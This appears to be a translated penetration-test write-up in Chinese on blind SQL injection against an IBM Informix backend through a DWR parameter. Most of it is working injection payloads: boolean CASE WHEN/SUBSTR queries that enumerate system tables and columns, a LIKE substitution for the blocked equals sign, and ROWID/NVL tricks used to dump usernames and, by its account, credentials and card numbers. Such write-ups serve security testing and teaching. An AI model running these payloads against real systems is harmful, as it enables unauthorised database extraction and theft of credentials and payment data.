Informix数据库SQL注入实战

安全 数据安全
在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。本文,笔者来介绍他遇到的问题以及如何解决并dump数据库。

在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。

SQLI出现这种情况的原因:

1.开发中带来的问题

2.数据库正在使用

下面,我来介绍我遇到的问题以及如何解决并dump数据库。该应用程序使用一种名为DWR后端的JAVA远程调用框架,系统调用是这样的:

Informix数据库SQL注入实战

这是位于C0-param1的参数,从表面上看起来很容易,因为它给了详细的错误信息,当一个单引号被添加到参数尾部时,会得到以下错误信息:“java.sql.SQLException: A syntax error has occurred.”(语法错误)

Informix数据库SQL注入实战

c0-param1参数控制有多少结果从数据库中检索出来,这注射点出现在类似于mssql的TOP keyword位置和MYSQL的Limit。我认为SQLI跑MSSQL库比MYSQL更合适。我添加一系列请求如下图所示:

Informix数据库SQL注入实战

执行查询后,得到一个错误信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”数据库系统是IBM的Informix,我对Informix了解甚少,所以还得一个函数一个函数地查IBM的文档。

现在知道这是Informix,能帮助我们对次注射是怎么产生的,第一个子句,类似TOP和LIMIT,查询起来是这样的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果条件为真(即当前用户名的第一个字母为'a'),查询将返回结果,反则会报错,因为子查询(SELECT 1 FROM SYSTABLES)会返回多个结果。然而,又有难题了,不能使用等号,通过替换,使用以下语句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了这些注射知识和概念就好整多了,掏出sqlmap(从我的同事那里弄到了些小技巧,而且观摩了他的帖子“Sqlmap的高级注入技巧”),Sqlmap的确是很好的工具,作者是今年在大会上认识的一个很不错的家伙写的。。。好像跑题了。不过遗憾的是,Sqlmap不支持Informix,所以我不得不自己写工具了:

获取表名的长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过一个小研究,我发现Informix的表实际上有一个隐藏很深的列名:ROWID,每一行都存在一个这样的序列号。然而,这些ROWID可以分散,删除或插入到表。为了找到包含数据的ROWID,我调用一个名为NVL的函数,这个函数可以返回不同的结果,具体取决于第一个参数是否为NULL。最终找到一处可能总是包含数据的一列,语句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过这种方法,能够发现纯文本应用程序凭据,明文银行SFTP凭证和未加密的支付卡号码。

随着这一成功,明白了以前对Informix数据库想知道的。

原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html

责任编辑:蓝雨泪 来源: FreebuF
相关推荐

2013-07-25 20:36:02

2010-04-12 08:59:00

2009-01-07 09:46:18

InformixOnline数据库

2022-11-04 08:34:27

Oracle数据库

2010-09-09 14:31:31

SQL函数数据库

2017-05-18 12:45:57

Informix-On备份数据库

2013-04-26 11:39:40

2010-09-30 09:11:01

2009-03-09 09:26:49

Informix数据库管理OLTP

2011-03-04 10:30:25

ASP数据库

2015-09-15 16:29:25

2009-10-09 15:20:12

2011-03-25 09:46:16

Informix数据库安全性安全审计

2010-07-15 17:28:50

SQL Server

2010-06-30 08:46:51

升级SQL Serve

2021-05-17 06:57:34

SQLServer数据库

2012-12-10 10:57:04

IBMdW

2022-12-07 18:45:22

内存数据库Redis

2018-02-10 09:44:19

2010-07-30 09:49:05

点赞
收藏

51CTO技术栈公众号